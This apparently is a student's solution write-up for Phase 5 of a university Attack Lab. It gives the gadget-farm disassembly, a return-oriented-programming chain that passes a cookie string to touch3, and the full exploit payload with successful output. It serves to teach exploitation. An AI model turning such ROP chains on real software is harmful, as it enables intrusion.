Attack Lab: Phase 5
About 4 minAbout 1113 words
Run
objdump --disassemble rtarget > rtarget.asm
Read File rtarget.asm
...
0000000000401c78 <touch3>:
...
0000000000401d0f <start_farm>:
401d0f: b8 01 00 00 00 mov $0x1,%eax
401d14: c3 retq
0000000000401d15 <addval_420>:
401d15: 8d 87 48 89 c7 94 lea -0x6b3876b8(%rdi),%eax
401d1b: c3 retq
0000000000401d1c <setval_146>:
401d1c: c7 07 58 92 90 90 movl $0x90909258,(%rdi)
401d22: c3 retq
0000000000401d23 <addval_451>:
401d23: 8d 87 00 58 c3 1c lea 0x1cc35800(%rdi),%eax
401d29: c3 retq
0000000000401d2a <addval_158>:
401d2a: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
401d30: c3 retq
0000000000401d31 <setval_387>:
401d31: c7 07 58 c3 08 57 movl $0x5708c358,(%rdi)
401d37: c3 retq
0000000000401d38 <getval_439>:
401d38: b8 48 89 c7 c3 mov $0xc3c78948,%eax
401d3d: c3 retq
0000000000401d3e <getval_205>:
401d3e: b8 b7 d7 58 c2 mov $0xc258d7b7,%eax
401d43: c3 retq
0000000000401d44 <setval_398>:
401d44: c7 07 48 89 c7 c7 movl $0xc7c78948,(%rdi)
401d4a: c3 retq
0000000000401d4b <mid_farm>:
401d4b: b8 01 00 00 00 mov $0x1,%eax
401d50: c3 retq
0000000000401d51 <add_xy>:
401d51: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
401d55: c3 retq
0000000000401d56 <getval_493>:
401d56: b8 89 c1 08 d2 mov $0xd208c189,%eax
401d5b: c3 retq
0000000000401d5c <getval_480>:
401d5c: b8 89 d6 08 db mov $0xdb08d689,%eax
401d61: c3 retq
0000000000401d62 <getval_269>:
401d62: b8 89 ca 60 c9 mov $0xc960ca89,%eax
401d67: c3 retq
0000000000401d68 <getval_133>:
401d68: b8 5e 48 88 e0 mov $0xe088485e,%eax
401d6d: c3 retq
0000000000401d6e <addval_307>:
401d6e: 8d 87 99 c1 20 c9 lea -0x36df3e67(%rdi),%eax
401d74: c3 retq
0000000000401d75 <addval_127>:
401d75: 8d 87 81 d6 84 d2 lea -0x2d7b297f(%rdi),%eax
401d7b: c3 retq
0000000000401d7c <addval_116>:
401d7c: 8d 87 89 c1 90 90 lea -0x6f6f3e77(%rdi),%eax
401d82: c3 retq
0000000000401d83 <addval_120>:
401d83: 8d 87 2e 48 88 e0 lea -0x1f77b7d2(%rdi),%eax
401d89: c3 retq
0000000000401d8a <getval_260>:
401d8a: b8 a9 d6 20 c0 mov $0xc020d6a9,%eax
401d8f: c3 retq
0000000000401d90 <getval_400>:
401d90: b8 48 89 e0 c3 mov $0xc3e08948,%eax
401d95: c3 retq
0000000000401d96 <addval_196>:
401d96: 8d 87 c9 c1 20 db lea -0x24df3e37(%rdi),%eax
401d9c: c3 retq
0000000000401d9d <setval_327>:
401d9d: c7 07 89 c1 00 d2 movl $0xd200c189,(%rdi)
401da3: c3 retq
0000000000401da4 <getval_253>:
401da4: b8 89 d6 00 db mov $0xdb00d689,%eax
401da9: c3 retq
0000000000401daa <setval_300>:
401daa: c7 07 81 c1 20 c0 movl $0xc020c181,(%rdi)
401db0: c3 retq
0000000000401db1 <getval_176>:
401db1: b8 48 89 e0 94 mov $0x94e08948,%eax
401db6: c3 retq
0000000000401db7 <setval_430>:
401db7: c7 07 4a 09 ca 90 movl $0x90ca094a,(%rdi)
401dbd: c3 retq
0000000000401dbe <getval_168>:
401dbe: b8 89 ca 20 db mov $0xdb20ca89,%eax
401dc3: c3 retq
0000000000401dc4 <getval_337>:
401dc4: b8 89 ca 28 db mov $0xdb28ca89,%eax
401dc9: c3 retq
0000000000401dca <setval_190>:
401dca: c7 07 c9 c1 84 db movl $0xdb84c1c9,(%rdi)
401dd0: c3 retq
0000000000401dd1 <addval_479>:
401dd1: 8d 87 89 d6 90 c3 lea -0x3c6f2977(%rdi),%eax
401dd7: c3 retq
0000000000401dd8 <getval_448>:
401dd8: b8 89 ca c3 99 mov $0x99c3ca89,%eax
401ddd: c3 retq
0000000000401dde <addval_105>:
401dde: 8d 87 48 89 e0 92 lea -0x6d1f76b8(%rdi),%eax
401de4: c3 retq
0000000000401de5 <getval_267>:
401de5: b8 b2 48 89 e0 mov $0xe08948b2,%eax
401dea: c3 retq
0000000000401deb <getval_311>:
401deb: b8 09 d6 90 c3 mov $0xc390d609,%eax
401df0: c3 retq
0000000000401df1 <addval_404>:
401df1: 8d 87 48 8b e0 c3 lea -0x3c1f74b8(%rdi),%eax
401df7: c3 retq
0000000000401df8 <setval_115>:
401df8: c7 07 a9 d6 08 c0 movl $0xc008d6a9,(%rdi)
401dfe: c3 retq
0000000000401dff <addval_306>:
401dff: 8d 87 99 ca 20 d2 lea -0x2ddf3567(%rdi),%eax
401e05: c3 retq
0000000000401e06 <addval_170>:
401e06: 8d 87 48 89 e0 94 lea -0x6b1f76b8(%rdi),%eax
401e0c: c3 retq
0000000000401e0d <addval_257>:
401e0d: 8d 87 89 c1 18 db lea -0x24e73e77(%rdi),%eax
401e13: c3 retq
0000000000401e14 <addval_325>:
401e14: 8d 87 8d ca 08 c9 lea -0x36f73573(%rdi),%eax
401e1a: c3 retq
0000000000401e1b <getval_109>:
401e1b: b8 99 d6 84 c9 mov $0xc984d699,%eax
401e20: c3 retq
0000000000401e21 <setval_488>:
401e21: c7 07 a1 a9 ca 90 movl $0x90caa9a1,(%rdi)
401e27: c3 retq
0000000000401e28 <end_farm>:
...
Design Gadget
48 89 e0 movq %rsp, %rax
48 89 c7 movq %rax, %rdi
58 popq %rax
89 c1 movl %eax, %ecx
89 ca movl %ecx, %edx
89 d6 movl %edx, %esi
48 8d 04 37 lea (%rdi,%rsi,1),%rax
48 89 c7 movq %rax, %rdi
Search Gadget in rtarget.asm
0000000000401d90 <getval_400>:
401d90: b8 48 89 e0 c3 mov $0xc3e08948,%eax
401d95: c3 retq
0000000000401d2a <addval_158>:
401d2a: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
401d30: c3 retq
0000000000401d23 <addval_451>:
401d23: 8d 87 00 58 c3 1c lea 0x1cc35800(%rdi),%eax
401d29: c3 retq
0000000000401d7c <addval_116>:
401d7c: 8d 87 89 c1 90 90 lea -0x6f6f3e77(%rdi),%eax
401d82: c3 retq
0000000000401dd8 <getval_448>:
401dd8: b8 89 ca c3 99 mov $0x99c3ca89,%eax
401ddd: c3 retq
0000000000401dd1 <addval_479>:
401dd1: 8d 87 89 d6 90 c3 lea -0x3c6f2977(%rdi),%eax
401dd7: c3 retq
0000000000401d51 <add_xy>:
401d51: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
401d55: c3 retq
0000000000401d2a <addval_158>:
401d2a: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
401d30: c3 retq
Design ROP
0000000000401d91: 48 89 e0 c3 movq %rsp, %rax
0000000000401d2c: 48 89 c7 c3 movq %rax, %rdi
0000000000401d26: 58 c3 popq %rax
0000000000401d7e: 89 c1 90 90 c3 movl %eax, %ecx
0000000000401dd9: 89 ca c3 movl %ecx, %edx
0000000000401dd3: 89 d6 movl %edx, %esi
0000000000401d51: 48 8d 04 37 c3 lea (%rdi,%rsi,1),%rax
0000000000401d2c: 48 89 c7 movq %rax, %rdi
0000000000401c78: <touch3>
Read File cookie.txt
0x3a9a6c2f
Convert Cookie to String
The string should end with a \0.
33 61 39 61 36 63 32 66 00
Write File phase-5.txt
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
91 1d 40 00 00 00 00 00
2c 1d 40 00 00 00 00 00
26 1d 40 00 00 00 00 00
48 00 00 00 00 00 00 00
7e 1d 40 00 00 00 00 00
d9 1d 40 00 00 00 00 00
d3 1d 40 00 00 00 00 00
51 1d 40 00 00 00 00 00
2c 1d 40 00 00 00 00 00
78 1c 40 00 00 00 00 00
33 61 39 61 36 63 32 66 00
Run
./hex2raw < phase-5.txt > phase-5.in
./rtarget -i phase-5.in
Terminal Output
Cookie: 0x3a9a6c2f
Touch3!: You called touch3("3a9a6c2f")
Valid solution for level 3 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!